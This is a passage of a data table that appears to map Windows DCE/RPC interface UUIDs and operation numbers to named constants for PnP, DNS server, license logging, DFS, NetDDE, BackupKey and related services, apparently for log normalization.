8d9f4e40-a03d-11ce-8f69-08003e30051b:13 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_REG_PROP
8d9f4e40-a03d-11ce-8f69-08003e30051b:14 XDM_CONST.DCERPC_OPERATION_PNP_SET_DEVICE_REG_PROP
8d9f4e40-a03d-11ce-8f69-08003e30051b:15 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_INSTANCE
8d9f4e40-a03d-11ce-8f69-08003e30051b:16 XDM_CONST.DCERPC_OPERATION_PNP_CREATE_KEY
8d9f4e40-a03d-11ce-8f69-08003e30051b:17 XDM_CONST.DCERPC_OPERATION_PNP_DELETE_REGISTRY_KEY
8d9f4e40-a03d-11ce-8f69-08003e30051b:18 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_COUNT
8d9f4e40-a03d-11ce-8f69-08003e30051b:19 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_NAME
8d9f4e40-a03d-11ce-8f69-08003e30051b:20 XDM_CONST.DCERPC_OPERATION_PNP_DELETE_CLASS_KEY
8d9f4e40-a03d-11ce-8f69-08003e30051b:21 XDM_CONST.DCERPC_OPERATION_PNP_GET_INTERFACE_DEVICE_ALIAS
8d9f4e40-a03d-11ce-8f69-08003e30051b:22 XDM_CONST.DCERPC_OPERATION_PNP_GET_INTERFACE_DEVICE_LIST
8d9f4e40-a03d-11ce-8f69-08003e30051b:23 XDM_CONST.DCERPC_OPERATION_PNP_GET_INTERFACE_DEVICE_LIST_SIZE
8d9f4e40-a03d-11ce-8f69-08003e30051b:24 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_DEVICE_CLASS_ASSOCIATION
8d9f4e40-a03d-11ce-8f69-08003e30051b:25 XDM_CONST.DCERPC_OPERATION_PNP_UNREGISTER_DEVICE_CLASS_ASSOCIATION
8d9f4e40-a03d-11ce-8f69-08003e30051b:26 XDM_CONST.DCERPC_OPERATION_PNP_GET_CLASS_REG_PROP
8d9f4e40-a03d-11ce-8f69-08003e30051b:27 XDM_CONST.DCERPC_OPERATION_PNP_SET_CLASS_REG_PROP
8d9f4e40-a03d-11ce-8f69-08003e30051b:28 XDM_CONST.DCERPC_OPERATION_PNP_CREATE_DEV_INST
8d9f4e40-a03d-11ce-8f69-08003e30051b:29 XDM_CONST.DCERPC_OPERATION_PNP_DEVICE_INSTANCE_ACTION
8d9f4e40-a03d-11ce-8f69-08003e30051b:30 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_STATUS
8d9f4e40-a03d-11ce-8f69-08003e30051b:31 XDM_CONST.DCERPC_OPERATION_PNP_SET_DEVICE_PROBLEM
8d9f4e40-a03d-11ce-8f69-08003e30051b:32 XDM_CONST.DCERPC_OPERATION_PNP_DISABLE_DEV_INST
8d9f4e40-a03d-11ce-8f69-08003e30051b:33 XDM_CONST.DCERPC_OPERATION_PNP_UNINSTALL_DEV_INST
8d9f4e40-a03d-11ce-8f69-08003e30051b:34 XDM_CONST.DCERPC_OPERATION_PNP_ADD_ID
8d9f4e40-a03d-11ce-8f69-08003e30051b:35 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_DRIVER
8d9f4e40-a03d-11ce-8f69-08003e30051b:36 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_REMOVE
8d9f4e40-a03d-11ce-8f69-08003e30051b:37 XDM_CONST.DCERPC_OPERATION_PNP_REQUEST_DEVICE_EJECT
8d9f4e40-a03d-11ce-8f69-08003e30051b:38 XDM_CONST.DCERPC_OPERATION_PNP_IS_DOCK_STATION_PRESENT
8d9f4e40-a03d-11ce-8f69-08003e30051b:39 XDM_CONST.DCERPC_OPERATION_PNP_REQUEST_EJECT_PC
8d9f4e40-a03d-11ce-8f69-08003e30051b:40 XDM_CONST.DCERPC_OPERATION_PNP_HW_PROF_FLAGS
8d9f4e40-a03d-11ce-8f69-08003e30051b:41 XDM_CONST.DCERPC_OPERATION_PNP_GET_HW_PROF_INFO
8d9f4e40-a03d-11ce-8f69-08003e30051b:42 XDM_CONST.DCERPC_OPERATION_PNP_ADD_EMPTY_LOG_CONF
8d9f4e40-a03d-11ce-8f69-08003e30051b:43 XDM_CONST.DCERPC_OPERATION_PNP_FREE_LOG_CONF
8d9f4e40-a03d-11ce-8f69-08003e30051b:44 XDM_CONST.DCERPC_OPERATION_PNP_GET_FIRST_LOG_CONF
8d9f4e40-a03d-11ce-8f69-08003e30051b:45 XDM_CONST.DCERPC_OPERATION_PNP_GET_NEXT_LOG_CONF
8d9f4e40-a03d-11ce-8f69-08003e30051b:46 XDM_CONST.DCERPC_OPERATION_PNP_GET_LOG_CONF_PRIORITY
8d9f4e40-a03d-11ce-8f69-08003e30051b:47 XDM_CONST.DCERPC_OPERATION_PNP_ADD_RES_DES
8d9f4e40-a03d-11ce-8f69-08003e30051b:48 XDM_CONST.DCERPC_OPERATION_PNP_FREE_RES_DES
8d9f4e40-a03d-11ce-8f69-08003e30051b:49 XDM_CONST.DCERPC_OPERATION_PNP_GET_NEXT_RES_DES
8d9f4e40-a03d-11ce-8f69-08003e30051b:50 XDM_CONST.DCERPC_OPERATION_PNP_GET_RES_DES_DATA
8d9f4e40-a03d-11ce-8f69-08003e30051b:51 XDM_CONST.DCERPC_OPERATION_PNP_GET_RES_DES_DATA_SIZE
8d9f4e40-a03d-11ce-8f69-08003e30051b:52 XDM_CONST.DCERPC_OPERATION_PNP_MODIFY_RES_DES
8d9f4e40-a03d-11ce-8f69-08003e30051b:53 XDM_CONST.DCERPC_OPERATION_PNP_DETECT_RESOURCE_CONFLICT
8d9f4e40-a03d-11ce-8f69-08003e30051b:54 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_RES_CONF_LIST
8d9f4e40-a03d-11ce-8f69-08003e30051b:55 XDM_CONST.DCERPC_OPERATION_PNP_SET_HW_PROF
8d9f4e40-a03d-11ce-8f69-08003e30051b:56 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_ARBITRATOR_FREE_DATA
8d9f4e40-a03d-11ce-8f69-08003e30051b:57 XDM_CONST.DCERPC_OPERATION_PNP_QUERY_ARBITRATOR_FREE_SIZE
8d9f4e40-a03d-11ce-8f69-08003e30051b:58 XDM_CONST.DCERPC_OPERATION_PNP_RUN_DETECTION
8d9f4e40-a03d-11ce-8f69-08003e30051b:59 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_NOTIFICATION
8d9f4e40-a03d-11ce-8f69-08003e30051b:60 XDM_CONST.DCERPC_OPERATION_PNP_UNREGISTER_NOTIFICATION
8d9f4e40-a03d-11ce-8f69-08003e30051b:61 XDM_CONST.DCERPC_OPERATION_PNP_GET_CUSTOM_DEV_PROP
8d9f4e40-a03d-11ce-8f69-08003e30051b:62 XDM_CONST.DCERPC_OPERATION_PNP_GET_VERSION_INTERNAL
8d9f4e40-a03d-11ce-8f69-08003e30051b:63 XDM_CONST.DCERPC_OPERATION_PNP_GET_BLOCKED_DRIVER_INFO
8d9f4e40-a03d-11ce-8f69-08003e30051b:64 XDM_CONST.DCERPC_OPERATION_PNP_GET_SERVER_SIDE_DEVICE_INSTALL_FLAGS
8d9f4e40-a03d-11ce-8f69-08003e30051b:65 XDM_CONST.DCERPC_OPERATION_PNP_GET_OBJECT_PROP_KEYS
8d9f4e40-a03d-11ce-8f69-08003e30051b:66 XDM_CONST.DCERPC_OPERATION_PNP_GET_OBJECT_PROP
8d9f4e40-a03d-11ce-8f69-08003e30051b:67 XDM_CONST.DCERPC_OPERATION_PNP_SET_OBJECT_PROP
8d9f4e40-a03d-11ce-8f69-08003e30051b:68 XDM_CONST.DCERPC_OPERATION_PNP_INSTALL_DEV_INST
8d9f4e40-a03d-11ce-8f69-08003e30051b:69 XDM_CONST.DCERPC_OPERATION_PNP_APPLY_POWER_SETTINGS
8d9f4e40-a03d-11ce-8f69-08003e30051b:70 XDM_CONST.DCERPC_OPERATION_PNP_DRIVER_STORE_ADD_DRIVER_PACKAGE
8d9f4e40-a03d-11ce-8f69-08003e30051b:71 XDM_CONST.DCERPC_OPERATION_PNP_DRIVER_STORE_DELETE_DRIVER_PACKAGE
8d9f4e40-a03d-11ce-8f69-08003e30051b:72 XDM_CONST.DCERPC_OPERATION_PNP_REGISTER_SERVICE_NOTIFICATION
8d9f4e40-a03d-11ce-8f69-08003e30051b:73 XDM_CONST.DCERPC_OPERATION_PNP_SET_ACTIVE_SERVICE
8d9f4e40-a03d-11ce-8f69-08003e30051b:74 XDM_CONST.DCERPC_OPERATION_PNP_DELETE_SERVICE_DEVICES
50abc2a4-574d-40b3-9d66-ee4fd5fba076:0 XDM_CONST.DCERPC_OPERATION_DNSSRV_OPERATION
50abc2a4-574d-40b3-9d66-ee4fd5fba076:1 XDM_CONST.DCERPC_OPERATION_DNSSRV_QUERY
50abc2a4-574d-40b3-9d66-ee4fd5fba076:2 XDM_CONST.DCERPC_OPERATION_DNSSRV_COMPLEX_OPERATION
50abc2a4-574d-40b3-9d66-ee4fd5fba076:3 XDM_CONST.DCERPC_OPERATION_DNSSRV_ENUM_RECORDS
50abc2a4-574d-40b3-9d66-ee4fd5fba076:4 XDM_CONST.DCERPC_OPERATION_DNSSRV_UPDATE_RECORD
50abc2a4-574d-40b3-9d66-ee4fd5fba076:5 XDM_CONST.DCERPC_OPERATION_DNSSRV_OPERATION2
50abc2a4-574d-40b3-9d66-ee4fd5fba076:6 XDM_CONST.DCERPC_OPERATION_DNSSRV_QUERY2
50abc2a4-574d-40b3-9d66-ee4fd5fba076:7 XDM_CONST.DCERPC_OPERATION_DNSSRV_COMPLEX_OPERATION2
50abc2a4-574d-40b3-9d66-ee4fd5fba076:8 XDM_CONST.DCERPC_OPERATION_DNSSRV_ENUM_RECORDS2
50abc2a4-574d-40b3-9d66-ee4fd5fba076:9 XDM_CONST.DCERPC_OPERATION_DNSSRV_UPDATE_RECORD2
57674cd0-5200-11ce-a897-08002b2e9c6d:0 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_REQUEST_W
57674cd0-5200-11ce-a897-08002b2e9c6d:1 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_FREE
342cfd40-3c6c-11ce-a893-08002b2e9c6d:0 XDM_CONST.DCERPC_OPERATION_LLSR_CONNECT
342cfd40-3c6c-11ce-a893-08002b2e9c6d:1 XDM_CONST.DCERPC_OPERATION_LLSR_CLOSE
342cfd40-3c6c-11ce-a893-08002b2e9c6d:2 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:3 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:4 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:5 XDM_CONST.DCERPC_OPERATION_LLSR_LICENSE_ADD_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:6 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:7 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:8 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:9 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_ADD_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:10 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_USER_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:11 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_USER_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:12 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SERVER_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:13 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SERVER_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:14 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSE_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:15 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSE_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:16 XDM_CONST.DCERPC_OPERATION_LLSR_USER_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:17 XDM_CONST.DCERPC_OPERATION_LLSR_USER_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:18 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_GET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:19 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_GET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:20 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_SET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:21 XDM_CONST.DCERPC_OPERATION_LLSR_USER_INFO_SET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:22 XDM_CONST.DCERPC_OPERATION_LLSR_USER_DELETE_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:23 XDM_CONST.DCERPC_OPERATION_LLSR_USER_DELETE_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:24 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:25 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:26 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_DELETE_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:27 XDM_CONST.DCERPC_OPERATION_LLSR_USER_PRODUCT_DELETE_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:28 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:29 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:30 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_GET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:31 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_GET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:32 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_SET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:33 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_INFO_SET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:34 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:35 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:36 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:37 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_ADD_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:38 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_DELETE_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:39 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_USER_DELETE_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:40 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:41 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_ADD_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:42 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_DELETE_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:43 XDM_CONST.DCERPC_OPERATION_LLSR_MAPPING_DELETE_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:44 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:45 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:46 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_PRODUCT_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:47 XDM_CONST.DCERPC_OPERATION_LLSR_SERVER_PRODUCT_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:48 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:49 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:50 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_GET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:51 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_GET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:52 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_SET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:53 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_SET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:54 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_GET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:55 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_GET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:56 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_SET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:57 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_SET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:58 XDM_CONST.DCERPC_OPERATION_LLSR_REPL_CONNECT
342cfd40-3c6c-11ce-a893-08002b2e9c6d:59 XDM_CONST.DCERPC_OPERATION_LLSR_REPL_CLOSE
342cfd40-3c6c-11ce-a893-08002b2e9c6d:60 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_REQUEST_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:61 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_SERVER_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:62 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_SERVER_SERVICE_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:63 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_SERVICE_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:64 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_USER_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:65 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_GET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:66 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_GET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:67 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_SET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:68 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_SET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:69 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSES_GET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:70 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSES_GET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:71 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:72 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:73 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_CHECK_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:74 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_CHECK_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:75 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:76 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:77 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_CERT_DB_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:78 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_PRODUCT_SECURITY_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:79 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_USER_ADD_EX_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:80 XDM_CONST.DCERPC_OPERATION_LLSR_CAPABILITY_GET
342cfd40-3c6c-11ce-a893-08002b2e9c6d:81 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ENUM_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:82 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ENUM_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:83 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ADD_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:84 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ADD_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:85 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_SET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:86 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_SET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:87 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_GET_W
342cfd40-3c6c-11ce-a893-08002b2e9c6d:88 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_GET_A
342cfd40-3c6c-11ce-a893-08002b2e9c6d:89 XDM_CONST.DCERPC_OPERATION_LLSR_CLOSE_EX
91ae6020-9e3c-11cf-8d7c-00aa00c091be:0 XDM_CONST.DCERPC_OPERATION_CERT_SERVER_REQUEST
4fc742e0-4a10-11cf-8273-00aa004ae673:0 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_GET_VERSION
4fc742e0-4a10-11cf-8273-00aa004ae673:1 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD
4fc742e0-4a10-11cf-8273-00aa004ae673:2 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE
4fc742e0-4a10-11cf-8273-00aa004ae673:3 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_INFO
4fc742e0-4a10-11cf-8273-00aa004ae673:4 XDM_CONST.DCERPC_OPERATION_NETR_DFS_GET_INFO
4fc742e0-4a10-11cf-8273-00aa004ae673:5 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ENUM
4fc742e0-4a10-11cf-8273-00aa004ae673:6 XDM_CONST.DCERPC_OPERATION_NETR_DFS_RENAME
4fc742e0-4a10-11cf-8273-00aa004ae673:7 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MOVE
4fc742e0-4a10-11cf-8273-00aa004ae673:8 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_GET_CONFIG_INFO
4fc742e0-4a10-11cf-8273-00aa004ae673:9 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_SEND_SITE_INFO
4fc742e0-4a10-11cf-8273-00aa004ae673:10 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD_FT_ROOT
4fc742e0-4a10-11cf-8273-00aa004ae673:11 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE_FT_ROOT
4fc742e0-4a10-11cf-8273-00aa004ae673:12 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD_STD_ROOT
4fc742e0-4a10-11cf-8273-00aa004ae673:13 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE_STD_ROOT
4fc742e0-4a10-11cf-8273-00aa004ae673:14 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_INITIALIZE
4fc742e0-4a10-11cf-8273-00aa004ae673:15 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD_STD_ROOT_FORCED
4fc742e0-4a10-11cf-8273-00aa004ae673:16 XDM_CONST.DCERPC_OPERATION_NETR_DFS_GET_DC_ADDRESS
4fc742e0-4a10-11cf-8273-00aa004ae673:17 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_DC_ADDRESS
4fc742e0-4a10-11cf-8273-00aa004ae673:18 XDM_CONST.DCERPC_OPERATION_NETR_DFS_FLUSH_FT_TABLE
4fc742e0-4a10-11cf-8273-00aa004ae673:19 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD2
4fc742e0-4a10-11cf-8273-00aa004ae673:20 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE2
4fc742e0-4a10-11cf-8273-00aa004ae673:21 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ENUM_EX
4fc742e0-4a10-11cf-8273-00aa004ae673:22 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_INFO2
83da7c00-e84f-11d2-9807-00c04f8ec850:0 XDM_CONST.DCERPC_OPERATION_SFC_SRV_GET_NEXT_PROTECTED_FILE
83da7c00-e84f-11d2-9807-00c04f8ec850:1 XDM_CONST.DCERPC_OPERATION_SFC_SRV_IS_FILE_PROTECTED
83da7c00-e84f-11d2-9807-00c04f8ec850:2 XDM_CONST.DCERPC_OPERATION_SFC_SRV_FILE_EXCEPTION
83da7c00-e84f-11d2-9807-00c04f8ec850:3 XDM_CONST.DCERPC_OPERATION_SFC_SRV_INITIATE_SCAN
83da7c00-e84f-11d2-9807-00c04f8ec850:4 XDM_CONST.DCERPC_OPERATION_SFC_SRV_PURGE_CACHE
83da7c00-e84f-11d2-9807-00c04f8ec850:5 XDM_CONST.DCERPC_OPERATION_SFC_SRV_SET_CACHE_SIZE
83da7c00-e84f-11d2-9807-00c04f8ec850:6 XDM_CONST.DCERPC_OPERATION_SFC_SRV_SET_DISABLE
83da7c00-e84f-11d2-9807-00c04f8ec850:7 XDM_CONST.DCERPC_OPERATION_SFC_SRV_INSTALL_PROTECTED_FILES
2f5f3220-c126-1076-b549-074d078619da:0 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_ADD_W
2f5f3220-c126-1076-b549-074d078619da:1 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_DEL_A
2f5f3220-c126-1076-b549-074d078619da:2 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_DEL_W
2f5f3220-c126-1076-b549-074d078619da:3 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_SHARE_SECURITY_A
2f5f3220-c126-1076-b549-074d078619da:4 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_SHARE_SECURITY_W
2f5f3220-c126-1076-b549-074d078619da:5 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_SHARE_SECURITY_A
2f5f3220-c126-1076-b549-074d078619da:6 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_SHARE_SECURITY_W
2f5f3220-c126-1076-b549-074d078619da:7 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_ENUM_A
2f5f3220-c126-1076-b549-074d078619da:8 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_ENUM_W
2f5f3220-c126-1076-b549-074d078619da:9 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_GET_INFO_W
2f5f3220-c126-1076-b549-074d078619da:10 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_SET_INFO_W
2f5f3220-c126-1076-b549-074d078619da:11 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_TRUSTED_SHARE_A
2f5f3220-c126-1076-b549-074d078619da:12 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_TRUSTED_SHARE_W
2f5f3220-c126-1076-b549-074d078619da:13 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_TRUSTED_SHARE_A
2f5f3220-c126-1076-b549-074d078619da:14 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_TRUSTED_SHARE_W
2f5f3220-c126-1076-b549-074d078619da:15 XDM_CONST.DCERPC_OPERATION_N_DDE_TRUSTED_SHARE_ENUM_A
2f5f3220-c126-1076-b549-074d078619da:16 XDM_CONST.DCERPC_OPERATION_N_DDE_TRUSTED_SHARE_ENUM_W
2f5f3220-c126-1076-b549-074d078619da:18 XDM_CONST.DCERPC_OPERATION_N_DDE_SPECIAL_COMMAND
3dde7c30-165d-11d1-ab8f-00805f14db40:0 XDM_CONST.DCERPC_OPERATION_BKRP_BACKUP_KEY
6bffd098-a112-3610-9833-46c3f87e345a:0 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_GET_INFO
